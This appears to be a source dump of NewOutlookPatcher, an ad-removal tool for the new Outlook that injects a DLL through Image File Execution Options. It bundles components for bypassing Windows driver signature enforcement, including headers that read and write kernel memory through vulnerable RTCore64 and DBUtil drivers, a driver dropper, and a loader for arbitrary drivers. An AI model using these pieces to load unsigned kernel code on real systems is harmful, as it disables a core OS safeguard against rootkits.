├── NOP ├── loader2 │ ├── 16.ico │ ├── 32.ico │ ├── msvcrt.lib │ ├── resource.h │ ├── DSE-Patcher.rc │ ├── pstdint.h │ ├── MyDialog1.h │ ├── DSE-Patcher.exe.manifest │ ├── RTCore64.h │ ├── DBUtil.h │ ├── DSE-Patcher.vcxproj.filters │ ├── hde64.h │ ├── table64.h │ ├── MyFunctions.h │ ├── DSE-Patcher.vcxproj │ ├── hde64.c │ └── MyDialog1.cpp ├── worker │ ├── packages.config │ ├── worker.vcxproj.filters │ ├── worker.vcxproj │ └── dllmain.cpp ├── installer │ ├── installer.vcxproj.filters │ ├── installer.inf │ ├── Driver.c │ └── installer.vcxproj └── gui │ ├── gui.csproj │ ├── Form1.resx │ ├── Program.cs │ └── Form1.Designer.cs ├── .github └── FUNDING.yml ├── GDRVLoader.vcxproj.user ├── binary └── dropper.h ├── GDRVLoader.cpp ├── GDRVLoader.vcxproj.filters ├── .gitattributes ├── hde ├── hde64.h ├── table64.h └── hde64.c ├── README.md ├── NOP.sln ├── GDRVLoader.vcxproj ├── global.h ├── exploit ├── pe.cpp └── swind2.cpp └── .gitignore /NOP/loader2/16.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/16.ico -------------------------------------------------------------------------------- /NOP/loader2/32.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/32.ico -------------------------------------------------------------------------------- /NOP/loader2/msvcrt.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/msvcrt.lib -------------------------------------------------------------------------------- /NOP/loader2/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/resource.h -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/valinet/NewOutlookPatcher/HEAD/NOP/loader2/DSE-Patcher.rc -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | custom: ['https://www.paypal.com/donate?business=valentingabrielradu%40gmail.com&no_recurring=0&item_name=NewOutlookPatcher'] 2 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /NOP/loader2/pstdint.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _PSTDINT 3 | #define _PSTDINT 4 | 5 | #include 6 | 7 | // integer types for Hacker Disassembler Engine 64 (HDE) 8 | typedef UINT8 uint8_t; 9 | typedef UINT16 uint16_t; 10 | typedef UINT32 uint32_t; 11 | typedef UINT64 uint64_t; 12 | 13 | #endif // _PSTDINT 14 | 15 | -------------------------------------------------------------------------------- /NOP/worker/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /binary/dropper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "bytes.h" 3 | 4 | bool DropDriverFromBytes(const wchar_t* path) 5 | { 6 | HANDLE h_file; 7 | BOOLEAN b_status = FALSE; 8 | DWORD byte = 0; 9 | 10 | h_file = CreateFileW(path, GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL); 11 | if (GetLastError() == ERROR_FILE_EXISTS) 12 | return true; 13 | 14 | if (h_file == INVALID_HANDLE_VALUE) 15 | return false; 16 | 17 | b_status = WriteFile(h_file, shell_mapper, sizeof(shell_mapper), &byte, nullptr); 18 | CloseHandle(h_file); 19 | 20 | if (!b_status) 21 | return false; 22 | 23 | return true; 24 | } 25 | -------------------------------------------------------------------------------- /NOP/loader2/MyDialog1.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | #ifndef _MYDIALOG1 21 | #define _MYDIALOG1 22 | 23 | int MyDlg1EnableControls(unsigned char ucEnable); 24 | 25 | #endif // _MYDIALOG1 26 | 27 | -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.exe.manifest: -------------------------------------------------------------------------------- 1 | Patch DSE (Driver Signature Enforcement)true -------------------------------------------------------------------------------- /NOP/worker/worker.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /GDRVLoader.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | #include "binary/dropper.h" 3 | 4 | #define CUSTOM_DRIVER L"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" 5 | 6 | int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { 7 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 8 | { 9 | //if (DropDriverFromBytes(DriverPath)) 10 | { 11 | Status = WindLoadDriver((PWCHAR)L"", (PWCHAR)CUSTOM_DRIVER, FALSE); 12 | 13 | if (NT_SUCCESS(Status)) 14 | printf("Driver loaded successfully\n"); 15 | } 16 | } 17 | { 18 | // Unload driver 19 | Status = WindUnloadDriver((PWCHAR)CUSTOM_DRIVER, 0); 20 | if (NT_SUCCESS(Status)) 21 | printf("Driver unloaded successfully\n"); 22 | } 23 | if (!NT_SUCCESS(Status)) 24 | printf("Error: %08X\n", Status); 25 | return true; 26 | } 27 | -------------------------------------------------------------------------------- /NOP/loader2/RTCore64.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | #ifndef _RTCORE64 21 | #define _RTCORE64 22 | 23 | #include 24 | 25 | // function exports 26 | int MyRTCore64OpenDevice(char *szDriverFile,HANDLE *hDevice); 27 | int MyRTCore64ReadMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 28 | int MyRTCore64WriteMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 29 | // binary driver export 30 | extern BYTE RTCore64Driver[14024]; 31 | 32 | #endif // _RTCORE64 33 | 34 | -------------------------------------------------------------------------------- /NOP/installer/installer.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | -------------------------------------------------------------------------------- /NOP/gui/gui.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | WinExe 5 | net8.0-windows 6 | win-x64 7 | enable 8 | true 9 | enable 10 | true 11 | NewOutlookPatcher 12 | 2024.06.24.03 13 | 2024.06.24.03 14 | https://github.com/valinet/NewOutlookPatcher 15 | Copyright 2024 VALINET Solutions. All rights reserved. 16 | Disable ads and product placement in the new Outlook for Windows app. 17 | 2024.06.24.03 18 | true 19 | NewOutlookPatcher 20 | NewOutlookPatcher 21 | VALINET Solutions SRL 22 | NewOutlookPatcher 23 | True 24 | NewOutlookPatcher 25 | NewOutlookPatcher 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /NOP/loader2/DBUtil.h: -------------------------------------------------------------------------------- 1 | 2 | // DSE-Patcher - Patch DSE (Driver Signature Enforcement) 3 | // Copyright (C) 2022 Kai Schtrom 4 | // 5 | // This file is part of DSE-Patcher. 6 | // 7 | // DSE-Patcher is free software: you can redistribute it and/or modify 8 | // it under the terms of the GNU General Public License as published by 9 | // the Free Software Foundation, either version 3 of the License, or 10 | // (at your option) any later version. 11 | // 12 | // DSE-Patcher is distributed in the hope that it will be useful, 13 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | // GNU General Public License for more details. 16 | // 17 | // You should have received a copy of the GNU General Public License 18 | // along with DSE-Patcher. If not, see . 19 | 20 | #ifndef _DBUTIL 21 | #define _DBUTIL 22 | 23 | #include 24 | 25 | // function exports 26 | int MyDBUtilOpenDevice(char *szDriverFile,HANDLE *hDevice); 27 | int MyDBUtilReadMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD *dwValue); 28 | int MyDBUtilWriteMemory(HANDLE hDevice,DWORD64 dw64Address,DWORD dwSize,DWORD dwValue); 29 | // binary driver exports 30 | extern BYTE DBUtil_v23_sys[14840]; 31 | extern BYTE DBUtil_v25_sys[24952]; 32 | extern BYTE DBUtil_v25_inf[2204]; 33 | extern BYTE DBUtil_v25_cat[10065]; 34 | extern BYTE DBUtil_v26_sys[27896]; 35 | extern BYTE DBUtil_v26_inf[2333]; 36 | extern BYTE DBUtil_v26_cat[10072]; 37 | extern BYTE DBUtil_v27_sys[24968]; 38 | extern BYTE DBUtil_v27_inf[2499]; 39 | extern BYTE DBUtil_v27_cat[10358]; 40 | extern BYTE DBUtil_v27_WdfCI[1730168]; 41 | 42 | #endif // _DBUTIL 43 | 44 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {642f4797-7b5e-46b2-b5bf-d27522e70bd4} 6 | 7 | 8 | {6c1f4902-8567-466b-aa97-8983f2a2a1b0} 9 | 10 | 11 | {bd3d2744-d845-40dc-8b16-fd416ca97bc0} 12 | 13 | 14 | {7ef1f0a2-f1f9-4a60-97e9-36fdb55f080b} 15 | 16 | 17 | 18 | 19 | 20 | Exploit 21 | 22 | 23 | Hde 24 | 25 | 26 | Exploit 27 | 28 | 29 | 30 | 31 | Binary 32 | 33 | 34 | Binary 35 | 36 | 37 | Hde 38 | 39 | 40 | Hde 41 | 42 | 43 | Utils 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /NOP/installer/installer.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; installer.inf 3 | ; 4 | 5 | [Version] 6 | Signature="$WINDOWS NT$" 7 | Class=System ; TODO: specify appropriate Class 8 | ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid 9 | Provider=%ManufacturerName% 10 | CatalogFile=installer.cat 11 | DriverVer= ; TODO: set DriverVer in stampinf property pages 12 | PnpLockdown=1 13 | 14 | [DestinationDirs] 15 | DefaultDestDir = 12 16 | installer_Device_CoInstaller_CopyFiles = 11 17 | 18 | [SourceDisksNames] 19 | 1 = %DiskName%,,,"" 20 | 21 | [SourceDisksFiles] 22 | installer.sys = 1,, 23 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames 24 | 25 | ;***************************************** 26 | ; Install Section 27 | ;***************************************** 28 | 29 | [Manufacturer] 30 | %ManufacturerName%=Standard,NT$ARCH$ 31 | 32 | [Standard.NT$ARCH$] 33 | %installer.DeviceDesc%=installer_Device, Root\installer ; TODO: edit hw-id 34 | 35 | [installer_Device.NT] 36 | CopyFiles=Drivers_Dir 37 | 38 | [Drivers_Dir] 39 | installer.sys 40 | 41 | ;-------------- Service installation 42 | [installer_Device.NT.Services] 43 | AddService = installer,%SPSVCINST_ASSOCSERVICE%, installer_Service_Inst 44 | 45 | ; -------------- installer driver install sections 46 | [installer_Service_Inst] 47 | DisplayName = %installer.SVCDESC% 48 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 49 | StartType = 3 ; SERVICE_DEMAND_START 50 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 51 | ServiceBinary = %12%\installer.sys 52 | 53 | ; 54 | ;--- installer_Device Coinstaller installation ------ 55 | ; 56 | 57 | [installer_Device.NT.CoInstallers] 58 | AddReg=installer_Device_CoInstaller_AddReg 59 | CopyFiles=installer_Device_CoInstaller_CopyFiles 60 | 61 | [installer_Device_CoInstaller_AddReg] 62 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller" 63 | 64 | [installer_Device_CoInstaller_CopyFiles] 65 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll 66 | 67 | [installer_Device.NT.Wdf] 68 | KmdfService = installer, installer_wdfsect 69 | [installer_wdfsect] 70 | KmdfLibraryVersion = $KMDFVERSION$ 71 | 72 | [Strings] 73 | SPSVCINST_ASSOCSERVICE= 0x00000002 74 | ManufacturerName="" ;TODO: Replace with your manufacturer name 75 | DiskName = "installer Installation Disk" 76 | installer.DeviceDesc = "installer Device" 77 | installer.SVCDESC = "installer Service" 78 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Header Files 55 | 56 | 57 | Header Files 58 | 59 | 60 | 61 | 62 | Resource Files 63 | 64 | 65 | 66 | 67 | Resource Files 68 | 69 | 70 | Resource Files 71 | 72 | 73 | 74 | 75 | Resource Files 76 | 77 | 78 | -------------------------------------------------------------------------------- /NOP/loader2/hde64.h: -------------------------------------------------------------------------------- 1 | 2 | // Hacker Disassembler Engine 64 3 | // Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | // All rights reserved. 5 | // 6 | // hde64.h: C/C++ header file 7 | // 8 | 9 | #ifndef _HDE64_H_ 10 | #define _HDE64_H_ 11 | 12 | // stdint.h - C99 standard header 13 | // http://en.wikipedia.org/wiki/stdint.h 14 | // 15 | // if your compiler doesn't contain "stdint.h" header (for 16 | // example, Microsoft Visual C++), you can download file: 17 | // http://www.azillionmonkeys.com/qed/pstdint.h 18 | // and change next line to: 19 | // #include "pstdint.h" 20 | // 21 | #include "pstdint.h" 22 | 23 | #define F_MODRM 0x00000001 24 | #define F_SIB 0x00000002 25 | #define F_IMM8 0x00000004 26 | #define F_IMM16 0x00000008 27 | #define F_IMM32 0x00000010 28 | #define F_IMM64 0x00000020 29 | #define F_DISP8 0x00000040 30 | #define F_DISP16 0x00000080 31 | #define F_DISP32 0x00000100 32 | #define F_RELATIVE 0x00000200 33 | #define F_ERROR 0x00001000 34 | #define F_ERROR_OPCODE 0x00002000 35 | #define F_ERROR_LENGTH 0x00004000 36 | #define F_ERROR_LOCK 0x00008000 37 | #define F_ERROR_OPERAND 0x00010000 38 | #define F_PREFIX_REPNZ 0x01000000 39 | #define F_PREFIX_REPX 0x02000000 40 | #define F_PREFIX_REP 0x03000000 41 | #define F_PREFIX_66 0x04000000 42 | #define F_PREFIX_67 0x08000000 43 | #define F_PREFIX_LOCK 0x10000000 44 | #define F_PREFIX_SEG 0x20000000 45 | #define F_PREFIX_REX 0x40000000 46 | #define F_PREFIX_ANY 0x7f000000 47 | 48 | #define PREFIX_SEGMENT_CS 0x2e 49 | #define PREFIX_SEGMENT_SS 0x36 50 | #define PREFIX_SEGMENT_DS 0x3e 51 | #define PREFIX_SEGMENT_ES 0x26 52 | #define PREFIX_SEGMENT_FS 0x64 53 | #define PREFIX_SEGMENT_GS 0x65 54 | #define PREFIX_LOCK 0xf0 55 | #define PREFIX_REPNZ 0xf2 56 | #define PREFIX_REPX 0xf3 57 | #define PREFIX_OPERAND_SIZE 0x66 58 | #define PREFIX_ADDRESS_SIZE 0x67 59 | 60 | #pragma pack(push,1) 61 | 62 | typedef struct { 63 | uint8_t len; 64 | uint8_t p_rep; 65 | uint8_t p_lock; 66 | uint8_t p_seg; 67 | uint8_t p_66; 68 | uint8_t p_67; 69 | uint8_t rex; 70 | uint8_t rex_w; 71 | uint8_t rex_r; 72 | uint8_t rex_x; 73 | uint8_t rex_b; 74 | uint8_t opcode; 75 | uint8_t opcode2; 76 | uint8_t modrm; 77 | uint8_t modrm_mod; 78 | uint8_t modrm_reg; 79 | uint8_t modrm_rm; 80 | uint8_t sib; 81 | uint8_t sib_scale; 82 | uint8_t sib_index; 83 | uint8_t sib_base; 84 | union { 85 | uint8_t imm8; 86 | uint16_t imm16; 87 | uint32_t imm32; 88 | uint64_t imm64; 89 | } imm; 90 | union { 91 | uint8_t disp8; 92 | uint16_t disp16; 93 | uint32_t disp32; 94 | } disp; 95 | uint32_t flags; 96 | } hde64s; 97 | 98 | #pragma pack(pop) 99 | 100 | #ifdef __cplusplus 101 | extern "C" { 102 | #endif 103 | 104 | // __cdecl 105 | unsigned int hde64_disasm(const void *code, hde64s *hs); 106 | 107 | #ifdef __cplusplus 108 | } 109 | #endif 110 | 111 | #endif // _HDE64_H_ 112 | 113 | -------------------------------------------------------------------------------- /hde/hde64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | * hde64.h: C/C++ header file 7 | * 8 | */ 9 | 10 | #ifndef _HDE64_H_ 11 | #define _HDE64_H_ 12 | 13 | /* stdint.h - C99 standard header 14 | * http://en.wikipedia.org/wiki/stdint.h 15 | * 16 | * if your compiler doesn't contain "stdint.h" header (for 17 | * example, Microsoft Visual C++), you can download file: 18 | * http://www.azillionmonkeys.com/qed/pstdint.h 19 | * and change next line to: 20 | * #include "pstdint.h" 21 | */ 22 | #include 23 | 24 | #define F_MODRM 0x00000001 25 | #define F_SIB 0x00000002 26 | #define F_IMM8 0x00000004 27 | #define F_IMM16 0x00000008 28 | #define F_IMM32 0x00000010 29 | #define F_IMM64 0x00000020 30 | #define F_DISP8 0x00000040 31 | #define F_DISP16 0x00000080 32 | #define F_DISP32 0x00000100 33 | #define F_RELATIVE 0x00000200 34 | #define F_ERROR 0x00001000 35 | #define F_ERROR_OPCODE 0x00002000 36 | #define F_ERROR_LENGTH 0x00004000 37 | #define F_ERROR_LOCK 0x00008000 38 | #define F_ERROR_OPERAND 0x00010000 39 | #define F_PREFIX_REPNZ 0x01000000 40 | #define F_PREFIX_REPX 0x02000000 41 | #define F_PREFIX_REP 0x03000000 42 | #define F_PREFIX_66 0x04000000 43 | #define F_PREFIX_67 0x08000000 44 | #define F_PREFIX_LOCK 0x10000000 45 | #define F_PREFIX_SEG 0x20000000 46 | #define F_PREFIX_REX 0x40000000 47 | #define F_PREFIX_ANY 0x7f000000 48 | 49 | #define PREFIX_SEGMENT_CS 0x2e 50 | #define PREFIX_SEGMENT_SS 0x36 51 | #define PREFIX_SEGMENT_DS 0x3e 52 | #define PREFIX_SEGMENT_ES 0x26 53 | #define PREFIX_SEGMENT_FS 0x64 54 | #define PREFIX_SEGMENT_GS 0x65 55 | #define PREFIX_LOCK 0xf0 56 | #define PREFIX_REPNZ 0xf2 57 | #define PREFIX_REPX 0xf3 58 | #define PREFIX_OPERAND_SIZE 0x66 59 | #define PREFIX_ADDRESS_SIZE 0x67 60 | 61 | #pragma pack(push,1) 62 | 63 | typedef struct { 64 | uint8_t len; 65 | uint8_t p_rep; 66 | uint8_t p_lock; 67 | uint8_t p_seg; 68 | uint8_t p_66; 69 | uint8_t p_67; 70 | uint8_t rex; 71 | uint8_t rex_w; 72 | uint8_t rex_r; 73 | uint8_t rex_x; 74 | uint8_t rex_b; 75 | uint8_t opcode; 76 | uint8_t opcode2; 77 | uint8_t modrm; 78 | uint8_t modrm_mod; 79 | uint8_t modrm_reg; 80 | uint8_t modrm_rm; 81 | uint8_t sib; 82 | uint8_t sib_scale; 83 | uint8_t sib_index; 84 | uint8_t sib_base; 85 | union { 86 | uint8_t imm8; 87 | uint16_t imm16; 88 | uint32_t imm32; 89 | uint64_t imm64; 90 | } imm; 91 | union { 92 | uint8_t disp8; 93 | uint16_t disp16; 94 | uint32_t disp32; 95 | } disp; 96 | uint32_t flags; 97 | } hde64s; 98 | 99 | #pragma pack(pop) 100 | 101 | #ifdef __cplusplus 102 | extern "C" { 103 | #endif 104 | 105 | /* __cdecl */ 106 | unsigned int hde64_disasm(const void *code, hde64s *hs); 107 | 108 | #ifdef __cplusplus 109 | } 110 | #endif 111 | 112 | #endif /* _HDE64_H_ */ 113 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

NewOutlookPatcher

2 | Join on Discord 3 |

Disable ads and product placement in new Outlook for Windows app.

4 |

Tested on:

5 |
    6 |
  • Windows 10 Version 21H2 (OS Build 19044.4046)
    • 7 |
  • Windows 11 Version 23H2 (OS Build 22621.3296)
    • 8 |
9 |

Donate

10 |

PayPal donations

11 |

Features

12 |
    13 |
  • Disable ad as first item in e-mails list
    • 14 |
  • Disable lower left corner OneDrive banner
    • 15 |
  • Disable Word, Excel, PowerPoint, To Do, OneDrive, More apps icons
    • 16 |
  • Enable F12 Developer Tools
    • 17 |
18 |
19 | Product image 20 |
21 |

How to?

22 |
    23 |
  1. Download the latest release.
    2. 24 |
  2. Run NewOutlookPatcher. Outlook will also open automatically in the background.
    3. 25 |
  3. Customize the configuration by checking/unchecking individual items.
    4. 26 |
  4. Press Install. The application will elevate itself, close Outlook, apply your setttings and restart Outlook for you.
    5. 27 |
28 |

Why is elevation required?

29 | The patcher requires administrative access in order to perform the following operations: 30 |
    31 |
  • Installing the patcher (NewOutlookPatcher.dll) in C:\Windows\System32\ which is write-protected for regular users.
    • 32 |
  • Configuring New Outlook for Windows to load the patcher when it starts up using the registry (in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\olk.exe).
    • 33 |
34 |

Uninstalling

35 |

Run NewOutlookPatcher and press the Uninstall button. Done.

36 |

Known issues

37 | 41 |

How it works?

42 |
    43 |
  • Everything is packed together in a tiny .NET 8-based executable. Required resources are extracted to a temporary folder at runtime.
    • 44 |
  • New Outlook (olk.exe) is patched using a DLL that is injected in its process. The DLL is loaded using the AppVerifier infrastructure. The project contains a very clean C++ implementation of this technique. This works because the process is not protected, thus being able to load unsigned code.
    • 45 |
  • The actual patching is done by hooking WebView2 methods, in order to execute scripts that alter the CSS once the main interface loads.
    • 46 |
47 |

Solution structure

48 |

The Visual Studio solution is divided in 5 projects:

49 |
    50 |
  • gui: Contains user interface and unpacker logic, C# .NET 8.
    • 51 |
  • worker: Module that gets loaded by Outlook which injects custom JavaScript and CSS in the user interface.
    • 52 |
53 |

Successful compilation is only possible for x64 at the moment. Files packed in the final executable are always grabbed from the Release folder, beware when building in Debug.

54 | -------------------------------------------------------------------------------- /NOP/loader2/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 